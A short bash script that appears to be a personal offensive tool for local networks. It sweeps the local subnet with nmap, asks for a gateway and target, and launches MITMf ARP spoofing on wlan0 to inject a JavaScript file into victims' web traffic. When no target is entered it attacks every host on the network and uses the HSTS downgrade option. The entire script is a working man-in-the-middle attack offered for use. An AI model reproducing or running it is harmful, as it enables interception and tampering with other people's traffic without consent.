#!/bin/bash
scn=$(nmap -sn $(ifconfig | grep -i 'inet addr' | grep -v '127.0.0' | awk '{print $2}' | cut -d':' -f2 | cut -d'.' -f1,2,3).0-255 | grep -v "Nmap done:" | awk '/Nmap scan report/{printf $5;printf "\t";getline;getline;$1=$2=""; print $0}')

echo -e "$scn"
dfg=$(echo -e "$scn" | head -1 | awk '{print $1}')
echo "Please enter gateway address[$dfg]:"
read GTW
if [[ -z $GTW ]]; then
	GTW=$dfg
fi
echo "$GTW"
echo "Please enter target address:"
read TGT
if [[ -z $TGT ]]; then
	mitmf -i wlan0 --spoof --arp --gateway $GTW --inject --js-file /root/scripts/flirt/cute.js --count-limit 1 --hsts
else
	mitmf -i wlan0 --spoof --arp --gateway $GTW --target $TGT --inject --js-file /root/scripts/flirt/cute.js
fi
